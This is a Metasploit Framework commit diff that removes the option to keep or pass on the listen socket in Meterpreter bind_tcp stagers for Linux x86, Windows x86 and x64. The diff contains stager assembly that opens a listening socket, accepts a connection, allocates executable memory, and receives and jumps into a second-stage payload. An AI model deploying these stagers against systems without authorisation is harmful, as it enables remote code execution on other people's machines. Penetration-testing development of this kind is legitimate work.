Remove the passing on off listen socket values

Author: OJ

lib/msf/base/sessions/meterpreter_options.rb

@@ -17,7 +17,6 @@ def initialize(info = {})
         OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
         OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]),
         OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]),
-        OptBool.new('StagerCloseListenSocket', [false, "Close the listen socket in the stager", false]),
         OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]),
         OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]),
         OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]),

lib/msf/core/payload/linux/bind_tcp.rb

@@ -16,27 +16,21 @@ module Payload::Linux::BindTcp
 
   include Msf::Payload::Linux
 
-  def close_listen_socket
-    datastore['StagerCloseListenSocket'].nil? || datastore['StagerCloseListenSocket'] == true
-  end
-
   #
   # Generate the first stage
   #
   def generate
 
     # Generate the simple version of this stager if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space
-      return generate_bind_tcp(
-        port:         datastore['LPORT'],
-        close_socket: close_listen_socket
-      )
+      return generate_bind_tcp({
+        :port => datastore['LPORT']
+      })
     end
 
     conf = {
-      port:         datastore['LPORT'],
-      close_socket: close_listen_socket,
-      reliable:     true
+      :port     => datastore['LPORT'],
+      :reliable => true
     }
 
     generate_bind_tcp(conf)
@@ -60,10 +54,6 @@ def required_space
     # Reliability checks add 4 bytes for the first check, 5 per recv check (2)
     space += 14
 
-    # Adding 6 bytes to the payload when we include the closing of the listen
-    # socket
-    space += 6 if close_listen_socket
-
     # The final estimated size
     space
   end
@@ -77,7 +67,6 @@ def required_space
   def asm_bind_tcp(opts={})
 
     #reliable     = opts[:reliable]
-    close_socket = opts[:close_socket]
     encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
 
     asm = %Q^
@@ -99,10 +88,9 @@ def asm_bind_tcp(opts={})
         mov ecx,esp
         mov al,0x66                   ; socketcall syscall
         int 0x80                      ; invoke socketcall (SYS_SOCKET)
-    ^
 
-    unless close_socket
-      asm << %Q^
+        ; TODO: verify that this is wanted (I think it should be),
+        ; TODO: and look to optimise this a little.
         ; set the SO_REUSEADDR flag on the socket
         push ecx
         push 4
@@ -119,10 +107,7 @@ def asm_bind_tcp(opts={})
         int 0x80
         xchg eax,edi                  ; restore the socket handle
         add esp, 0x14
-      ^
-    end
 
-    asm << %Q^
         pop ebx
         pop esi
         push edx
@@ -137,15 +122,8 @@ def asm_bind_tcp(opts={})
         shl ebx,1                     ; SYS_LISTEN
         mov al,0x66                   ; socketcall syscall (SYS_LISTEN)
         int 0x80                      ; invoke socketcall
-      ^
 
-    if close_socket
-      asm << %Q^
         push eax                      ; stash the listen socket
-      ^
-    end
-
-    asm << %Q^
         inc ebx                       ; SYS_ACCEPT
         mov al,0x66                   ; socketcall syscall
         mov [ecx+0x4],edx
@@ -155,16 +133,9 @@ def asm_bind_tcp(opts={})
         mov al,0x3                    ; read syscall
         int 0x80                      ; invoke read
         xchg ebx,edi                  ; stash the accept socket in edi
-    ^
-    if close_socket
-      asm << %Q^
         pop ebx                       ; restore the listen socket
         mov al,0x6                    ; close syscall
         int 0x80                      ; invoke close
-      ^
-    end
-
-    asm << %Q^
         jmp ecx                       ; jump to the payload
     ^
 

lib/msf/core/payload/windows/bind_tcp.rb

@@ -31,17 +31,15 @@ def generate
 
     # Generate the simple version of this stager if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space
-      return generate_bind_tcp(
-        port:         datastore['LPORT'].to_i,
-        close_socket: close_listen_socket
-      )
+      return generate_bind_tcp({
+        :port => datastore['LPORT'].to_i
+      })
     end
 
     conf = {
-      port:         datastore['LPORT'].to_i,
-      exitfunk:     datastore['EXITFUNC'],
-      close_socket: close_listen_socket,
-      reliable:     true
+      :port     => datastore['LPORT'].to_i,
+      :exitfunk => datastore['EXITFUNC'],
+      :reliable => true
     }
 
     generate_bind_tcp(conf)
@@ -107,7 +105,6 @@ def required_space
   def asm_bind_tcp(opts={})
 
     reliable     = opts[:reliable]
-    close_socket = opts[:close_socket]
     encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
 
     asm = %Q^
@@ -180,13 +177,9 @@ def asm_bind_tcp(opts={})
 
         push edi               ; push the listening socket, either to close, or to pass on
         xchg edi, eax          ; replace the listening socket with the new connected socket for further comms
+        push 0x614D6E75        ; hash( "ws2_32.dll", "closesocket" )
+        call ebp               ; closesocket( s );
       ^
-      if close_socket
-        asm << %Q^
-          push 0x614D6E75        ; hash( "ws2_32.dll", "closesocket" )
-          call ebp               ; closesocket( s );
-        ^
-      end
 
       asm << %Q^
       recv:
@@ -218,23 +211,7 @@ def asm_bind_tcp(opts={})
         call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         xchg ebx, eax          ; ebx = our new memory address for the new stage
-      ^
-      unless close_socket
-        asm << %Q^
-          pop eax              ; listen socket needs to be saved
-        ^
-      end
-      asm << %Q^
         push ebx               ; push the address of the new stage so we can return into it
-      ^
-
-      unless close_socket
-        asm << %Q^
-          push eax             ; and push the listen socket up again
-        ^
-      end
-
-      asm << %Q^
       read_more:               ;
         push 0                 ; flags
         push esi               ; length
@@ -256,13 +233,6 @@ def asm_bind_tcp(opts={})
         add ebx, eax           ; buffer += bytes_received
         sub esi, eax           ; length -= bytes_received, will set flags
         jnz read_more          ; continue if we have more to read
-        ^
-      unless close_socket
-        asm << %Q^
-          pop esi                ; put the listen socket in esi
-          ^
-      end
-      asm << %Q^
         ret                    ; return into the second stage
         ^
 

lib/msf/core/payload/windows/meterpreter_loader.rb

@@ -53,7 +53,6 @@ def asm_invoke_dll(opts={})
           ; offset from ReflectiveLoader() to the end of the DLL
           add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
           mov [ebx], edi        ; write the current socket to the config
-          mov [ebx+4], esi      ; write the current listen socket to the config
           push ebx              ; push the pointer to the configuration start
           push 4                ; indicate that we have attached
           push eax              ; push some arbitrary value for hInstance

lib/msf/core/payload/windows/x64/bind_tcp.rb

@@ -28,17 +28,15 @@ def close_listen_socket
   def generate
     # Generate the simple version of this stager if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space
-      return generate_bind_tcp(
-        port:         datastore['LPORT'],
-        close_socket: close_listen_socket
-      )
+      return generate_bind_tcp({
+        :port => datastore['LPORT']
+      })
     end
 
     conf = {
-      port:         datastore['LPORT'],
-      exitfunk:     datastore['EXITFUNC'],
-      close_socket: close_listen_socket,
-      reliable:     true
+      :port     => datastore['LPORT'],
+      :exitfunk => datastore['EXITFUNC'],
+      :reliable => true
     }
 
     generate_bind_tcp(conf)
@@ -104,7 +102,6 @@ def required_space
   #
   def asm_bind_tcp(opts={})
     reliable     = opts[:reliable]
-    close_socket = opts[:close_socket]
     encoded_port = "0x%.16x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
 
     asm = %Q^
@@ -160,24 +157,11 @@ def asm_bind_tcp(opts={})
         mov rcx, rdi           ; listening socket
         mov r10d, 0xE13BEC74   ; hash( "ws2_32.dll", "accept" )
         call rbp               ; accept( s, 0, 0 );
-      ^
-
-    if close_socket
-      asm << %Q^
         ; perform the call to closesocket...
         mov rcx, rdi           ; the listening socket to close
         mov rdi, rax           ; swap the new connected socket over the listening socket
         mov r10d, 0x614D6E75   ; hash( "ws2_32.dll", "closesocket" )
         call rbp               ; closesocket( s );
-      ^
-    else
-      asm << %Q^
-        mov r14, rdi           ; stash the listen socket for later.
-        mov rdi, rax           ; swap the new connected socket over the listening socket
-      ^
-    end
-
-    asm << %Q^
         ; restore RSP so we dont have any alignment issues with the next block...
         add rsp, #{408+8+8*4+32*7} ; cleanup the stack allocations
 
@@ -216,15 +200,6 @@ def asm_bind_tcp(opts={})
         sub rsi, rax           ; length -= bytes_received
         test rsi, rsi          ; test length
         jnz read_more          ; continue if we have more to read
-    ^
-
-    unless close_socket
-      asm << %Q^
-        mov rsi, r14           ; restore the listen socket
-      ^
-    end
-
-    asm << %Q^
         jmp r15                ; return into the second stage
     ^
 

lib/msf/core/payload/windows/x64/meterpreter_loader.rb

@@ -52,8 +52,7 @@ def asm_invoke_dll(opts={})
         ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config)
           ; offset from ReflectiveLoader() to the end of the DLL
           add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
-          mov [rbx], rdi        ; store the comms socket handle
-          mov [rbx+8], rsi      ; store the listen socket handle
+          mov dword ptr [rbx], edi        ; store the comms socket handle
           mov r8, rbx           ; r8 points to the extension list
           mov rbx, rax          ; save DllMain for another call
           push 4                ; push up 4, indicate that we have attached
@@ -85,7 +84,7 @@ def stage_meterpreter
     # patch the bootstrap code into the dll's DOS header...
     dll[ 0, bootstrap.length ] = bootstrap
 
-    return dll
+    dll
   end
 
 end

lib/rex/payloads/meterpreter/config.rb

@@ -40,17 +40,12 @@ def session_block(opts)
 
     session_data = [
       0,                  # comms socket, patched in by the stager
-      0,                  # listen socket, patched in by the stager
       exit_func,          # exit function identifer
       opts[:expiration],  # Session expiry
       uuid,               # the URL to use
     ]
 
-    if is_x86?
-      session_data.pack("VVVVA*")
-    else
-      session_data.pack("QQVVA*")
-    end
+    session_data.pack("VVVA*")
   end
 
   def transport_block(opts)